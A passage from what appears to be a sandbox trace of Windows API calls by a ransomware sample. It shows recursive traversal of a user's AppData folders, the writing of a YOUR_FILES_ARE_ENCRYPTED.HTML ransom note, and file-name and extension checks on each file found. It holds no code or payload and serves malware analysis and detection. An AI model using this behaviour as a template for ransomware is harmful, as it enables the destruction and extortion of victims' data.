param_2="%02X" | out: param_1="E0") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="EA") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="40") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="B9") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="D5") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="76") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="11") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="F0") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="F3") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="FF") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="07") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="37") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="D7") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="B8") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="7F") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="8E") returned 2 [0165.040] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="99") returned 2 [0165.040] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="9A") returned 2 [0165.040] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="E0") returned 2 [0165.040] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="0F") returned 2 [0165.040] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="C8") returned 2 [0165.040] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="E6") returned 2 [0165.040] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="6C") returned 2 [0165.040] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="5A") returned 2 [0165.040] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="45") returned 2 [0165.041] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\MbOel2sTiSRFkd2I.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\MbOel2sTiSRFkd2I.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\MbOel2sTiSRFkd2I.png" [0165.041] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.041] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0165.047] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x2ae8f460, ftLastAccessTime.dwHighDateTime=0x1d709ba, ftLastWriteTime.dwLowDateTime=0x2ae8f460, ftLastWriteTime.dwHighDateTime=0x1d709ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0165.047] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft") returned 49 [0165.047] GetProcessHeap () returned 0x270000 [0165.047] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0165.058] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft" [0165.058] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\*" [0165.059] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x2ae8f460, ftLastAccessTime.dwHighDateTime=0x1d709ba, ftLastWriteTime.dwLowDateTime=0x2ae8f460, ftLastWriteTime.dwHighDateTime=0x1d709ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0165.059] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x2ae8f460, ftLastAccessTime.dwHighDateTime=0x1d709ba, ftLastWriteTime.dwLowDateTime=0x2ae8f460, ftLastWriteTime.dwHighDateTime=0x1d709ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.059] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbb202220, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbb202220, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbb202220, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="AddIns", cAlternateFileName="")) returned 1 [0165.059] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\AddIns") returned 56 [0165.059] GetProcessHeap () returned 0x270000 [0165.059] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.060] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\AddIns" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\AddIns") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\AddIns" [0165.060] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\AddIns", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\AddIns\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\AddIns\\*" [0165.060] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\AddIns\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbb202220, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbb202220, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbb202220, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.061] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbb202220, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbb202220, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbb202220, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.061] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbb202220, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbb202220, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbb202220, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0165.061] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.062] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\AddIns\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 86 [0165.062] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\AddIns\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\addins\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.062] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.065] CloseHandle (hObject=0x5e4) returned 1 [0165.065] GetProcessHeap () returned 0x270000 [0165.066] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.067] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb1877c0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1877c0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb1877c0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Bibliography", cAlternateFileName="BIBLIO~1")) returned 1 [0165.067] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography") returned 62 [0165.067] GetProcessHeap () returned 0x270000 [0165.067] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.067] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography" [0165.067] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\*" [0165.067] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb1877c0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1877c0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb1877c0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.067] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb1877c0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1877c0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb1877c0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.067] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb1877c0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb1ad920, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Style", cAlternateFileName="")) returned 1 [0165.068] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style") returned 68 [0165.068] GetProcessHeap () returned 0x270000 [0165.068] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0165.068] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style" [0165.068] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*" [0165.068] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb1877c0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb1ad920, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0165.071] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb1877c0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb1ad920, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.071] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1877c0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1877c0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6e255db0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x51722, dwReserved0=0x0, dwReserved1=0x60, cFileName="APASixthEditionOfficeOnline.xsl", cAlternateFileName="APASIX~1.XSL")) returned 1 [0165.071] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl") returned 100 [0165.071] lstrcmpW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.071] PathFindExtensionW (pszPath="APASixthEditionOfficeOnline.xsl") returned=".xsl" [0165.071] lstrlenW (lpString=".xsl") returned 4 [0165.071] PathFindExtensionW (pszPath="APASixthEditionOfficeOnline.xsl") returned=".xsl" [0165.071] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1877c0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1877c0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6dff47b0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x48839, dwReserved0=0x0, dwReserved1=0x60, cFileName="CHICAGO.XSL", cAlternateFileName="")) returned 1 [0165.071] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL") returned 80 [0165.071] lstrcmpW (lpString1="CHICAGO.XSL", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.071] PathFindExtensionW (pszPath="CHICAGO.XSL") returned=".XSL" [0165.071] lstrlenW (lpString=".XSL") returned 4 [0165.071] PathFindExtensionW (pszPath="CHICAGO.XSL") returned=".XSL" [0165.071] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1877c0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1877c0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6df360d0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x4197e, dwReserved0=0x0, dwReserved1=0x60, cFileName="GB.XSL", cAlternateFileName="")) returned 1 [0165.071] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL") returned 75 [0165.072] lstrcmpW (lpString1="GB.XSL", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.072] PathFindExtensionW (pszPath="GB.XSL") returned=".XSL" [0165.072] lstrlenW (lpString=".XSL") returned 4 [0165.072] PathFindExtensionW (pszPath="GB.XSL") returned=".XSL" [0165.072] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1ad920, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6df360d0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x3e966, dwReserved0=0x0, dwReserved1=0x60, cFileName="GostName.XSL", cAlternateFileName="")) returned 1 [0165.072] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL") returned 81 [0165.072] lstrcmpW (lpString1="GostName.XSL", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.072] PathFindExtensionW (pszPath="GostName.XSL") returned=".XSL" [0165.072] lstrlenW (lpString=".XSL") returned 4 [0165.072] PathFindExtensionW (pszPath="GostName.XSL") returned=".XSL" [0165.072] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1ad920, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6dee9e10, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x3d639, dwReserved0=0x0, dwReserved1=0x60, cFileName="GostTitle.XSL", cAlternateFileName="GOSTTI~1.XSL")) returned 1 [0165.072] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL") returned 82 [0165.072] lstrcmpW (lpString1="GostTitle.XSL", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.072] PathFindExtensionW (pszPath="GostTitle.XSL") returned=".XSL" [0165.072] lstrlenW (lpString=".XSL") returned 4 [0165.072] PathFindExtensionW (pszPath="GostTitle.XSL") returned=".XSL" [0165.072] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1ad920, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6dee9e10, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x45882, dwReserved0=0x0, dwReserved1=0x60, cFileName="HarvardAnglia2008OfficeOnline.xsl", cAlternateFileName="HARVAR~1.XSL")) returned 1 [0165.072] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl") returned 102 [0165.072] lstrcmpW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.072] PathFindExtensionW (pszPath="HarvardAnglia2008OfficeOnline.xsl") returned=".xsl" [0165.072] lstrlenW (lpString=".xsl") returned 4 [0165.072] PathFindExtensionW (pszPath="HarvardAnglia2008OfficeOnline.xsl") returned=".xsl" [0165.072] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1ad920, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6e255db0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x47e7d, dwReserved0=0x0, dwReserved1=0x60, cFileName="IEEE2006OfficeOnline.xsl", cAlternateFileName="IEEE20~1.XSL")) returned 1 [0165.073] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl") returned 93 [0165.073] lstrcmpW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.073] PathFindExtensionW (pszPath="IEEE2006OfficeOnline.xsl") returned=".xsl" [0165.073] lstrlenW (lpString=".xsl") returned 4 [0165.073] PathFindExtensionW (pszPath="IEEE2006OfficeOnline.xsl") returned=".xsl" [0165.073] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1ad920, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6e255db0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x42132, dwReserved0=0x0, dwReserved1=0x60, cFileName="ISO690.XSL", cAlternateFileName="")) returned 1 [0165.073] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL") returned 79 [0165.073] lstrcmpW (lpString1="ISO690.XSL", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.073] PathFindExtensionW (pszPath="ISO690.XSL") returned=".XSL" [0165.073] lstrlenW (lpString=".XSL") returned 4 [0165.073] PathFindExtensionW (pszPath="ISO690.XSL") returned=".XSL" [0165.073] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1ad920, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6e209af0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x351ea, dwReserved0=0x0, dwReserved1=0x60, cFileName="ISO690Nmerical.XSL", cAlternateFileName="ISO690~1.XSL")) returned 1 [0165.073] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL") returned 87 [0165.073] lstrcmpW (lpString1="ISO690Nmerical.XSL", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.073] PathFindExtensionW (pszPath="ISO690Nmerical.XSL") returned=".XSL" [0165.073] lstrlenW (lpString=".XSL") returned 4 [0165.073] PathFindExtensionW (pszPath="ISO690Nmerical.XSL") returned=".XSL" [0165.073] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1ad920, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6e7fd1f0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x3e4f3, dwReserved0=0x0, dwReserved1=0x60, cFileName="MLASeventhEditionOfficeOnline.xsl", 